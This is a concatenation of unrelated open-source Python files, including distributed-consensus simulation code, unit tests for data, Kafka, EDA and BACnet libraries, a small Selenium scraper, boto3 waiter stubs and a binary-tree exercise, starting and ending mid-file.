async def sendPrepareMsgAsync(self, request):
return await self.callWithDelayOrTimeout(
lambda: self.destination.handlePrepareMsg(request)
)
async def sendCommitMsgAsync(self, request):
return await self.callWithDelayOrTimeout(
lambda: self.destination.handleCommitMsg(request)
)
async def sendCheckpointMsgAsync(self, request):
return await self.callWithDelayOrTimeout(
lambda: self.destination.handleCheckpointMsg(request)
)
N = 4
nodeList = [Node(i, view=0, is_primary=i == 0) for i in range(N)]
connectionMap = {}
for i in range(N):
for j in range(N):
if i == j:
continue
source = nodeList[i]
dest = nodeList[j]
source.addConnection(PbftConnection(source, dest))
for i in range(N):
asyncio.get_event_loop().create_task(nodeList[i].start())
# nodeList[-1].isCrashing = True
# nodeList[-2].isCrashing = True
nodeList[0].sendClientRequest(ClientRequest(b""))
try:
asyncio.get_event_loop().run_forever()
except Exception as e:
print(e)
|
tests/unit/butterfree/hooks/schema_compatibility/test_cassandra_table_schema_compatibility_hook.py | fossabot/butterfree | 208 | 12715514 | from unittest.mock import MagicMock
import pytest
from butterfree.clients import CassandraClient
from butterfree.hooks.schema_compatibility import CassandraTableSchemaCompatibilityHook
class TestCassandraTableSchemaCompatibilityHook:
def test_run_compatible_schema(self, spark_session):
cassandra_client = CassandraClient(host=["mock"], keyspace="dummy_keyspace")
cassandra_client.sql = MagicMock( # type: ignore
return_value=[
{"column_name": "feature1", "type": "text"},
{"column_name": "feature2", "type": "int"},
]
)
table = "table"
input_dataframe = spark_session.sql("select 'abc' as feature1, 1 as feature2")
hook = CassandraTableSchemaCompatibilityHook(cassandra_client, table)
# act and assert
assert hook.run(input_dataframe) == input_dataframe
def test_run_incompatible_schema(self, spark_session):
cassandra_client = CassandraClient(host=["mock"], keyspace="dummy_keyspace")
cassandra_client.sql = MagicMock( # type: ignore
return_value=[
{"column_name": "feature1", "type": "text"},
{"column_name": "feature2", "type": "bigint"},
]
)
table = "table"
input_dataframe = spark_session.sql("select 'abc' as feature1, 1 as feature2")
hook = CassandraTableSchemaCompatibilityHook(cassandra_client, table)
# act and assert
with pytest.raises(
ValueError, match="There's a schema incompatibility between"
):
hook.run(input_dataframe)
|
tests/tools/protocol/requests/test_offset_fetch_v1.py | akashvacher/kafka-tools | 578 | 12715518 | <reponame>akashvacher/kafka-tools<gh_stars>100-1000
import unittest
from kafka.tools.protocol.requests import ArgumentError
from kafka.tools.protocol.requests.offset_fetch_v2 import OffsetFetchV2Request
class OffsetFetchV2RequestTests(unittest.TestCase):
def test_process_arguments(self):
val = OffsetFetchV2Request.process_arguments(['groupname', 'topicname,4', 'nexttopic,9'])
assert val == {'group_id': 'groupname',
'topics': [{'topic': 'topicname', 'partitions': [4]},
{'topic': 'nexttopic', 'partitions': [9]}]}
def test_process_arguments_alltopics(self):
val = OffsetFetchV2Request.process_arguments(['groupname'])
assert val == {'group_id': 'groupname',
'topics': None}
def test_process_arguments_notenough(self):
self.assertRaises(ArgumentError, OffsetFetchV2Request.process_arguments, [])
|
PyFin/Math/Timeseries/__init__.py | rpatil524/Finance-Python | 325 | 12715520 | # -*- coding: utf-8 -*-
u"""
Created on 2015-8-8
@author: cheng.li
"""
__all__ = ['Timeseries',
'Normalizer']
from PyFin.Math.Timeseries.Timeseries import Timeseries
from PyFin.Math.Timeseries.Normalizers import Normalizer
|
__scraping__/fileinfo.com/main.py | whitmans-max/python-examples | 140 | 12715552 | #!/usr/bin/env python3
# date: 2020.04.19
# https://stackoverflow.com/questions/61298422/extracting-specific-elements-in-a-table-with-selenium-in-python/
import selenium.webdriver
driver = selenium.webdriver.Firefox()
# --- video ---
url = 'https://fileinfo.com/filetypes/video'
driver.get(url)
all_items = driver.find_elements_by_xpath('//td/a')
for item in all_items:
print(item.text)
#print(item.get_attribute('href'))
# --- audio ---
url = 'https://fileinfo.com/filetypes/audio'
driver.get(url)
all_items = driver.find_elements_by_xpath('//td/a')
for item in all_items:
print(item.text)
#print(item.get_attribute('href'))
|
tests/core/meta/meta.py | akmaru/veriloggen | 232 | 12715587 | <reponame>akmaru/veriloggen
from __future__ import absolute_import
from __future__ import print_function
import sys
import os
# the next line can be removed after installation
sys.path.insert(0, os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))
from veriloggen import *
# new intance methods for NewModule
_recipe_control = lambda m: (m.Input('CLK'), m.Input('RST'))
_recipe_led = lambda m, width=8: (m.OutputReg('LED', width, initval=0),
m.Reg('count', 32, initval=0))
# new class based on Module
NewModule = type('NewModule', (Module,),
{ 'recipe_control' : _recipe_control,
'recipe_led' : _recipe_led } )
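# Added note (illustrative): type(name, bases, namespace) is the dynamic form of a
# class statement, so type('NewModule', (Module,), {...}) above is equivalent to
# writing "class NewModule(Module):" with recipe_control/recipe_led as methods.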
def mkLed(width=8, maxcount=1024):
m = NewModule('blinkled')
clk, rst = m.recipe_control()
led, count = m.recipe_led(width)
m.Always(Posedge(clk))(
If(rst)(
count(0)
).Else(
If(count == 1023)(
count(0)
).Else(
count(count + 1)
)
))
m.Always(Posedge(clk))(
If(rst)(
led(0)
).Else(
If(count == 1024 - 1)(
led(led + 1)
)
))
return m
if __name__ == '__main__':
led = mkLed()
verilog = led.to_verilog()
print(verilog)
|
test/Clean/mkfifo.py | moroten/scons | 1,403 | 12715624 | <reponame>moroten/scons
#!/usr/bin/env python
#
# __COPYRIGHT__
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
__revision__ = "__FILE__ __REVISION__ __DATE__ __DEVELOPER__"
"""
Verify that SCons reports an error when cleaning up a target directory
containing a named pipe created with os.mkfifo().
"""
import os
import TestSCons
test = TestSCons.TestSCons()
if not hasattr(os, 'mkfifo'):
test.skip_test('No os.mkfifo() function; skipping test\n')
test_dir_name = 'testdir'
pipe_path = os.path.join(test_dir_name, 'namedpipe')
test.write('SConstruct', """\
Execute(Mkdir("{0}"))
dir = Dir("{0}")
Clean(dir, '{0}')
""".format(test_dir_name))
test.run(arguments='-Q -q', stdout='Mkdir("{0}")\n'.format(test_dir_name))
os.mkfifo(pipe_path)
test.must_exist(test.workpath(pipe_path))
expect1 = """\
Mkdir("{0}")
Path '{1}' exists but isn't a file or directory.
scons: Could not remove '{0}': Directory not empty
""".format(test_dir_name, pipe_path)
expect2 = """\
Mkdir("{0}")
Path '{1}' exists but isn't a file or directory.
scons: Could not remove '{0}': File exists
""".format(test_dir_name, pipe_path)
test.run(arguments='-c -Q -q')
test.must_exist(test.workpath(pipe_path))
if test.stdout() not in [expect1, expect2]:
test.diff(expect1, test.stdout(), 'STDOUT ')
test.fail_test()
test.pass_test()
# Local Variables:
# tab-width:4
# indent-tabs-mode:nil
# End:
# vim: set expandtab tabstop=4 shiftwidth=4:
|
challenge_4/python/tvanderwal/src/challenge_4.py | rchicoli/2017-challenges | 271 | 12715664 | #Challenge 4: Take a binary tree and reverse it
#I decided to create two classes. One to hold the node, and one to act as the Binary Tree.
#Node class
#Holds the data for one node: val is the node's value, left and right are the child nodes
class Node:
def __init__(self, val):
self.left = None
self.right = None
self.val = val
#BinaryTree class
class BinaryTree:
#Initialize the tree with a blank root
def __init__(self):
self.root = None
def getRoot(self):
return self.root
#Recursively add node objects
def add(self,val):
if self.root is None:
self.root = Node(val)
else:
self._add(val, self.root)
def _add(self, val, node):
if val < node.val:
if node.left is not None:
self._add(val, node.left)
else:
node.left = Node(val)
else:
if node.right is not None:
self._add(val, node.right)
else:
node.right = Node(val)
#Recursively print each node in the tree
def printTree(self):
if self.root is not None:
self._printTree(self.root)
def _printTree(self, node):
if node is not None:
self._printTree(node.left)
print(node.val)
self._printTree(node.right)
#returns a nested list of each level and the nodes in it
def getTree(self):
currLevel = [self.root]
tree = list()
while currLevel:
lowerLevel = list()
currNodes = list()
for node in currLevel:
currNodes.append(node.val)
if node.left:
lowerLevel.append(node.left)
if node.right:
lowerLevel.append(node.right)
tree.append(currNodes)
#print(currNodes)
currLevel = lowerLevel
return tree
if __name__ == '__main__':
#create sample tree from example
tree = BinaryTree()
tree.add(4)
tree.add(2)
tree.add(7)
tree.add(1)
tree.add(3)
tree.add(6)
tree.add(9)
#getTree returns the tree formatted in nested lists
formattedTree = tree.getTree()
#reverse the levels
for level in formattedTree:
level.reverse()
        print(level)
|
tests/pnr/test_hpwl.py | pretl/ALIGN-public | 119 | 12715670 | <gh_stars>100-1000
import json
import pathlib
from align.pnr.hpwl import gen_netlist, calculate_HPWL_from_placement_verilog_d, Interval, SemiPerimeter
from align.pnr.render_placement import standalone_overlap_checker
def test_interval():
i = Interval()
i.add( 7)
assert 0 == i.dist()
i.add( 3)
assert 4 == i.dist()
def test_semiperimeter():
sp = SemiPerimeter()
sp.addPoint( (3,7))
assert 0 == sp.dist()
sp.addRect( (10,10,12,12))
assert 14 == sp.dist()
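# Added note: HPWL (half-perimeter wirelength) sums, per net, the semi-perimeter of
# the bounding box of that net's pins. In test_gen_netlist below, the two pin rects
# land at (4,4,6,6) and (4,24,6,26), giving a box (4,4,6,26) and a semi-perimeter of
# (6 - 4) + (26 - 4) = 24, which is the asserted value.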
def test_gen_netlist():
placement_verilog_d = {
"global_signals": [],
"modules": [
{ "abstract_name": "top",
"concrete_name": "top",
"bbox": [0,0,100,100],
"parameters": [],
"instances": [
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u0",
"transformation": { "oX": 0, "oY": 0, "sX": 1, "sY": 1},
"fa_map": [{"formal": "x", "actual": "y"}]
},
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u1",
"transformation": { "oX": 0, "oY": 20, "sX": 1, "sY": 1},
"fa_map": [{"formal": "x", "actual": "y"}]
}
]
}
],
"leaves": [
{ "abstract_name": "a",
"concrete_name": "a",
"bbox": [0,0,10,10],
"terminals": [
{ "name": "x",
"rect": [4,4,6,6]
}
]
}
]
}
nets_d = gen_netlist( placement_verilog_d, 'top')
assert 24 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d)
def test_gen_netlist_flip():
placement_verilog_d = {
"global_signals": [],
"modules": [
{ "abstract_name": "top",
"concrete_name": "top",
"bbox": [0,0,100,100],
"parameters": [],
"instances": [
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u0",
"transformation": { "oX": 0, "oY": 0, "sX": 1, "sY": 1},
"fa_map": [{"formal": "x", "actual": "y"}]
},
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u1",
"transformation": { "oX": 15, "oY": 20, "sX": 1, "sY": 1},
"fa_map": [{"formal": "x", "actual": "y"}]
}
]
}
],
"leaves": [
{ "abstract_name": "a",
"concrete_name": "a",
"bbox": [0,0,10,10],
"terminals": [
{ "name": "x",
"rect": [1,2,3,4]
}
]
}
]
}
nets_d = gen_netlist( placement_verilog_d, 'top')
assert 39 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d)
placement_verilog_d['modules'][0]['instances'][0]['transformation'] = { "oX": 10, "oY": 0, "sX": -1, "sY": 1}
assert 33 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d)
placement_verilog_d['modules'][0]['instances'][0]['transformation'] = { "oX": 10, "oY": 10, "sX": -1, "sY": -1}
assert 29 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d)
placement_verilog_d['modules'][0]['instances'][0]['transformation'] = { "oX": 0, "oY": 10, "sX": 1, "sY": -1}
assert 35 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d)
def test_gen_netlist():
placement_verilog_d = {
"global_signals": [],
"modules": [
{ "abstract_name": "top",
"concrete_name": "top",
"bbox": [0,0,100,100],
"parameters": [],
"instances": [
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u0",
"transformation": { "oX": 0, "oY": 0, "sX": 1, "sY": 1},
"fa_map": [{"formal": "x", "actual": "y"}]
},
{
"abstract_template_name": "a",
"concrete_template_name": "a",
"instance_name": "u1",
"transformation": { "oX": 0, "oY": 20, "sX": 1, "sY": 1},
"fa_map": [{"formal": "x", "actual": "y"}]
}
]
}
],
"leaves": [
{ "abstract_name": "a",
"concrete_name": "a",
"bbox": [0,0,10,10],
"terminals": [
{ "name": "x",
"rect": [4,4,6,6]
}
]
}
],
"global_signals": [
{
"actual": "y"
}
]
}
nets_d = gen_netlist( placement_verilog_d, 'top')
assert 24 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d, skip_globals=False)
assert 0 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d, skip_globals=True)
placement_verilog_d['global_signals'][0]['actual'] = "a"
assert 24 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, 'top', nets_d, skip_globals=True)
def test_gen_netlist_matrix():
txt = """{
"global_signals": [],
"leaves": [
{
"abstract_name": "slice",
"bbox": [
0,
0,
800,
840
],
"concrete_name": "slice_a",
"terminal_centers": [
{
"center": [
400,
168
],
"name": "inp"
},
{
"center": [
400,
672
],
"name": "out"
}
],
"terminals": [
{
"name": "inp",
"rect": [
124,
152,
676,
184
]
},
{
"name": "out",
"rect": [
124,
656,
676,
688
]
}
]
}
],
"modules": [
{
"abstract_name": "matrix",
"bbox": [
0,
0,
2480,
3528
],
"concrete_name": "matrix_0",
"constraints": [
{
"abut": false,
"constraint": "order",
"direction": "top_to_bottom",
"instances": [
"u0",
"u1",
"u2",
"u3"
]
},
{
"constraint": "same_template",
"instances": [
"u0",
"u1",
"u2",
"u3"
]
}
],
"instances": [
{
"abstract_template_name": "row",
"concrete_template_name": "row_0",
"fa_map": [
{
"actual": "inp",
"formal": "inp"
},
{
"actual": "x1",
"formal": "out"
}
],
"instance_name": "u0",
"transformation": {
"oX": 0,
"oY": 2688,
"sX": 1,
"sY": 1
}
},
{
"abstract_template_name": "row",
"concrete_template_name": "row_0",
"fa_map": [
{
"actual": "x1",
"formal": "inp"
},
{
"actual": "x2",
"formal": "out"
}
],
"instance_name": "u1",
"transformation": {
"oX": 0,
"oY": 1764,
"sX": 1,
"sY": 1
}
},
{
"abstract_template_name": "row",
"concrete_template_name": "row_0",
"fa_map": [
{
"actual": "x2",
"formal": "inp"
},
{
"actual": "x3",
"formal": "out"
}
],
"instance_name": "u2",
"transformation": {
"oX": 0,
"oY": 924,
"sX": 1,
"sY": 1
}
},
{
"abstract_template_name": "row",
"concrete_template_name": "row_0",
"fa_map": [
{
"actual": "x3",
"formal": "inp"
},
{
"actual": "out",
"formal": "out"
}
],
"instance_name": "u3",
"transformation": {
"oX": 0,
"oY": 0,
"sX": 1,
"sY": 1
}
}
],
"parameters": [
"inp",
"out"
]
},
{
"abstract_name": "row",
"bbox": [
0,
0,
2480,
840
],
"concrete_name": "row_0",
"constraints": [
{
"abut": false,
"constraint": "order",
"direction": "left_to_right",
"instances": [
"u0",
"u1",
"u2"
]
},
{
"constraint": "same_template",
"instances": [
"u0",
"u1",
"u2"
]
}
],
"instances": [
{
"abstract_template_name": "slice",
"concrete_template_name": "slice_a",
"fa_map": [
{
"actual": "inp",
"formal": "inp"
},
{
"actual": "x1",
"formal": "out"
}
],
"instance_name": "u0",
"transformation": {
"oX": 0,
"oY": 0,
"sX": 1,
"sY": 1
}
},
{
"abstract_template_name": "slice",
"concrete_template_name": "slice_a",
"fa_map": [
{
"actual": "x1",
"formal": "inp"
},
{
"actual": "x2",
"formal": "out"
}
],
"instance_name": "u1",
"transformation": {
"oX": 880,
"oY": 0,
"sX": 1,
"sY": 1
}
},
{
"abstract_template_name": "slice",
"concrete_template_name": "slice_a",
"fa_map": [
{
"actual": "x2",
"formal": "inp"
},
{
"actual": "out",
"formal": "out"
}
],
"instance_name": "u2",
"transformation": {
"oX": 1680,
"oY": 0,
"sX": 1,
"sY": 1
}
}
],
"parameters": [
"inp",
"out"
]
}
]
}
"""
placement_verilog_d = json.loads(txt)
cn = 'matrix_0'
nets_d = gen_netlist( placement_verilog_d, cn)
assert 27584 == calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
placement_verilog_d['modules'][1]['instances'][1]['transformation']["oY"] += 840
placement_verilog_d['modules'][1]['instances'][1]['transformation']["sY"] = -1
assert standalone_overlap_checker( placement_verilog_d, cn)
hpwl = calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
print(hpwl)
assert 27584 > hpwl
placement_verilog_d['modules'][0]['instances'][1]['transformation']["oX"] += 2480
placement_verilog_d['modules'][0]['instances'][1]['transformation']["sX"] = -1
assert standalone_overlap_checker( placement_verilog_d, cn)
hpwl2 = calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
print(hpwl2)
assert hpwl > hpwl2
placement_verilog_d['modules'][0]['instances'][3]['transformation']["oX"] += 2480
placement_verilog_d['modules'][0]['instances'][3]['transformation']["sX"] = -1
assert standalone_overlap_checker( placement_verilog_d, cn)
hpwl3 = calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
print(hpwl3)
assert hpwl2 > hpwl3
placement_verilog_d['modules'][0]['instances'][0]['transformation']["oY"] += 840
placement_verilog_d['modules'][0]['instances'][0]['transformation']["sY"] = -1
placement_verilog_d['modules'][0]['instances'][1]['transformation']["oY"] += 840
placement_verilog_d['modules'][0]['instances'][1]['transformation']["sY"] = -1
placement_verilog_d['modules'][0]['instances'][2]['transformation']["oY"] += 840
placement_verilog_d['modules'][0]['instances'][2]['transformation']["sY"] = -1
placement_verilog_d['modules'][0]['instances'][3]['transformation']["oY"] += 840
placement_verilog_d['modules'][0]['instances'][3]['transformation']["sY"] = -1
assert standalone_overlap_checker( placement_verilog_d, cn)
hpwl4 = calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
print(hpwl4)
assert hpwl3 > hpwl4
placement_verilog_d['modules'][1]['instances'][1]['transformation']["oX"] -= 80
placement_verilog_d['modules'][1]['instances'][2]['transformation']["oX"] -= 80
assert standalone_overlap_checker( placement_verilog_d, cn)
hpwl5 = calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
print(hpwl5)
assert hpwl4 > hpwl5
placement_verilog_d['modules'][0]['instances'][0]['transformation']["oY"] -= 2*84
placement_verilog_d['modules'][0]['instances'][1]['transformation']["oY"] -= 84
placement_verilog_d['modules'][0]['instances'][2]['transformation']["oY"] -= 84
placement_verilog_d['modules'][0]['instances'][1]['transformation']["oX"] -= 80
placement_verilog_d['modules'][0]['instances'][3]['transformation']["oX"] -= 80
assert standalone_overlap_checker( placement_verilog_d, cn)
hpwl6 = calculate_HPWL_from_placement_verilog_d( placement_verilog_d, cn, nets_d)
print(hpwl6)
assert hpwl5 > hpwl6
print( hpwl6 / 27584 - 1)
|
boto3_type_annotations_with_docs/boto3_type_annotations/cloudformation/waiter.py | cowboygneox/boto3_type_annotations | 119 | 12715718 | <gh_stars>100-1000
from typing import Dict
from botocore.waiter import Waiter
class ChangeSetCreateComplete(Waiter):
def wait(self, ChangeSetName: str, StackName: str = None, NextToken: str = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`CloudFormation.Client.describe_change_set` every 30 seconds until a successful state is reached. An error is returned after 120 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudformation-2010-05-15/DescribeChangeSet>`_
**Request Syntax**
::
waiter.wait(
ChangeSetName='string',
StackName='string',
NextToken='string',
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type ChangeSetName: string
:param ChangeSetName: **[REQUIRED]**
The name or Amazon Resource Name (ARN) of the change set that you want to describe.
:type StackName: string
:param StackName:
If you specified the name of a change set, specify the stack name or ID (ARN) of the change set you want to describe.
:type NextToken: string
:param NextToken:
A string (provided by the DescribeChangeSet response output) that identifies the next page of information that you want to retrieve.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 30
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 120
:returns: None
"""
pass
class StackCreateComplete(Waiter):
def wait(self, StackName: str = None, NextToken: str = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`CloudFormation.Client.describe_stacks` every 30 seconds until a successful state is reached. An error is returned after 120 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudformation-2010-05-15/DescribeStacks>`_
**Request Syntax**
::
waiter.wait(
StackName='string',
NextToken='string',
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type StackName: string
:param StackName:
The name or the unique stack ID that is associated with the stack, which are not always interchangeable:
* Running stacks: You can specify either the stack\'s name or its unique stack ID.
* Deleted stacks: You must specify the unique stack ID.
Default: There is no default value.
:type NextToken: string
:param NextToken:
A string that identifies the next page of stacks that you want to retrieve.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 30
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 120
:returns: None
"""
pass
class StackDeleteComplete(Waiter):
def wait(self, StackName: str = None, NextToken: str = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`CloudFormation.Client.describe_stacks` every 30 seconds until a successful state is reached. An error is returned after 120 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudformation-2010-05-15/DescribeStacks>`_
**Request Syntax**
::
waiter.wait(
StackName='string',
NextToken='string',
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type StackName: string
:param StackName:
The name or the unique stack ID that is associated with the stack, which are not always interchangeable:
* Running stacks: You can specify either the stack\'s name or its unique stack ID.
* Deleted stacks: You must specify the unique stack ID.
Default: There is no default value.
:type NextToken: string
:param NextToken:
A string that identifies the next page of stacks that you want to retrieve.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 30
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 120
:returns: None
"""
pass
class StackExists(Waiter):
def wait(self, StackName: str = None, NextToken: str = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`CloudFormation.Client.describe_stacks` every 5 seconds until a successful state is reached. An error is returned after 20 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudformation-2010-05-15/DescribeStacks>`_
**Request Syntax**
::
waiter.wait(
StackName='string',
NextToken='string',
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type StackName: string
:param StackName:
The name or the unique stack ID that is associated with the stack, which are not always interchangeable:
* Running stacks: You can specify either the stack\'s name or its unique stack ID.
* Deleted stacks: You must specify the unique stack ID.
Default: There is no default value.
:type NextToken: string
:param NextToken:
A string that identifies the next page of stacks that you want to retrieve.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 5
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 20
:returns: None
"""
pass
class StackUpdateComplete(Waiter):
def wait(self, StackName: str = None, NextToken: str = None, WaiterConfig: Dict = None):
"""
Polls :py:meth:`CloudFormation.Client.describe_stacks` every 30 seconds until a successful state is reached. An error is returned after 120 failed checks.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/cloudformation-2010-05-15/DescribeStacks>`_
**Request Syntax**
::
waiter.wait(
StackName='string',
NextToken='string',
WaiterConfig={
'Delay': 123,
'MaxAttempts': 123
}
)
:type StackName: string
:param StackName:
The name or the unique stack ID that is associated with the stack, which are not always interchangeable:
* Running stacks: You can specify either the stack\'s name or its unique stack ID.
* Deleted stacks: You must specify the unique stack ID.
Default: There is no default value.
:type NextToken: string
:param NextToken:
A string that identifies the next page of stacks that you want to retrieve.
:type WaiterConfig: dict
:param WaiterConfig:
A dictionary that provides parameters to control waiting behavior.
- **Delay** *(integer) --*
The amount of time in seconds to wait between attempts. Default: 30
- **MaxAttempts** *(integer) --*
The maximum number of attempts to be made. Default: 120
:returns: None
"""
pass
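# --- Illustrative usage sketch (not part of the generated stubs) ---
# The waiters documented above are obtained at runtime from a boto3
# CloudFormation client; the stack name below is a hypothetical placeholder.
def _example_wait_for_stack_update(stack_name="my-stack"):
    import boto3
    client = boto3.client("cloudformation")
    waiter = client.get_waiter("stack_update_complete")
    # Poll describe_stacks every 30 seconds, for at most 120 attempts.
    waiter.wait(StackName=stack_name, WaiterConfig={"Delay": 30, "MaxAttempts": 120})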
|
xv_leak_tools/test_components/cleanup/cleanup.py | UAEKondaya1/expressvpn_leak_testing | 219 | 12715730 | from abc import ABCMeta, abstractmethod
from xv_leak_tools.test_components.component import Component
class Cleanup(Component, metaclass=ABCMeta):
@abstractmethod
def cleanup(self):
pass
|
aiogram/types/invoice.py | andrew-ld/aiogram | 2,744 | 12715744 | from . import base
from . import fields
class Invoice(base.TelegramObject):
"""
This object contains basic information about an invoice.
https://core.telegram.org/bots/api#invoice
"""
title: base.String = fields.Field()
description: base.String = fields.Field()
start_parameter: base.String = fields.Field()
currency: base.String = fields.Field()
total_amount: base.Integer = fields.Field()
|
tests/test_network/test_net_6.py | amih90/bacpypes | 240 | 12715765 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Test Network Number Discovery
-----------------------------
"""
import unittest
from bacpypes.debugging import bacpypes_debugging, ModuleLogger, btox, xtob
from bacpypes.core import deferred
from bacpypes.comm import Client, Server, bind
from bacpypes.pdu import PDU, Address, LocalBroadcast
from bacpypes.vlan import Network
from bacpypes.npdu import (
npdu_types, NPDU,
WhoIsRouterToNetwork, IAmRouterToNetwork, ICouldBeRouterToNetwork,
RejectMessageToNetwork, RouterBusyToNetwork, RouterAvailableToNetwork,
RoutingTableEntry, InitializeRoutingTable, InitializeRoutingTableAck,
EstablishConnectionToNetwork, DisconnectConnectionToNetwork,
WhatIsNetworkNumber, NetworkNumberIs,
)
from ..state_machine import match_pdu, StateMachineGroup, TrafficLog
from ..time_machine import reset_time_machine, run_time_machine
from .helpers import SnifferStateMachine, NetworkLayerStateMachine, RouterNode
# some debugging
_debug = 0
_log = ModuleLogger(globals())
#
# TNetwork1
#
@bacpypes_debugging
class TNetwork1(StateMachineGroup):
"""
Network 1 has sniffer1, the TD is on network 2 with sniffer2, network 3 has
sniffer3. Network 1 and 2 are connected with a router IUT1, network 2 and 3
are connected by router IUT2.
"""
def __init__(self):
if _debug: TNetwork1._debug("__init__")
StateMachineGroup.__init__(self)
# reset the time machine
reset_time_machine()
if _debug: TNetwork1._debug(" - time machine reset")
# create a traffic log
self.traffic_log = TrafficLog()
# implementation under test
self.iut1 = RouterNode() # router from vlan1 to vlan2
self.iut2 = RouterNode() # router from vlan2 to vlan3
# make a little LAN
self.vlan1 = Network(name="vlan1", broadcast_address=LocalBroadcast())
self.vlan1.traffic_log = self.traffic_log
# sniffer node
self.sniffer1 = NetworkLayerStateMachine("1", self.vlan1)
self.append(self.sniffer1)
# connect vlan1 to iut1
self.iut1.add_network("2", self.vlan1, 1)
# make another little LAN
self.vlan2 = Network(name="vlan2", broadcast_address=LocalBroadcast())
self.vlan2.traffic_log = self.traffic_log
# test device
self.td = NetworkLayerStateMachine("3", self.vlan2)
self.append(self.td)
# sniffer node
self.sniffer2 = NetworkLayerStateMachine("4", self.vlan2)
self.append(self.sniffer2)
# connect vlan2 to both routers
self.iut1.add_network("5", self.vlan2, 2)
self.iut2.add_network("6", self.vlan2, 2)
# make another little LAN
self.vlan3 = Network(name="vlan3", broadcast_address=LocalBroadcast())
self.vlan3.traffic_log = self.traffic_log
# sniffer node
self.sniffer3 = NetworkLayerStateMachine("7", self.vlan3)
self.append(self.sniffer3)
# connect vlan3 to the second router
self.iut2.add_network("8", self.vlan3, 3)
if _debug:
TNetwork1._debug(" - iut1.nsap: %r", self.iut1.nsap)
TNetwork1._debug(" - iut2.nsap: %r", self.iut2.nsap)
def run(self, time_limit=60.0):
if _debug: TNetwork1._debug("run %r", time_limit)
# run the group
super(TNetwork1, self).run()
# run it for some time
run_time_machine(time_limit)
if _debug:
TNetwork1._debug(" - time machine finished")
# list the state machines which shows their current state
for state_machine in self.state_machines:
TNetwork1._debug(" - machine: %r", state_machine)
# each one has a list of sent/received pdus
for direction, pdu in state_machine.transaction_log:
TNetwork1._debug(" %s %s %s",
direction,
pdu.pduSource or pdu.pduDestination,
pdu.__class__.__name__,
)
# traffic log has what was processed on each vlan
self.traffic_log.dump(TNetwork1._debug)
# check for success
all_success, some_failed = super(TNetwork1, self).check_for_success()
assert all_success
#
# TNetwork2
#
@bacpypes_debugging
class TNetwork2(StateMachineGroup):
"""
This test network is almost exactly the same as TNetwork1 with the
exception that IUT1 is connected to network 2 but doesn't know the
network number, it learns it from IUT2.
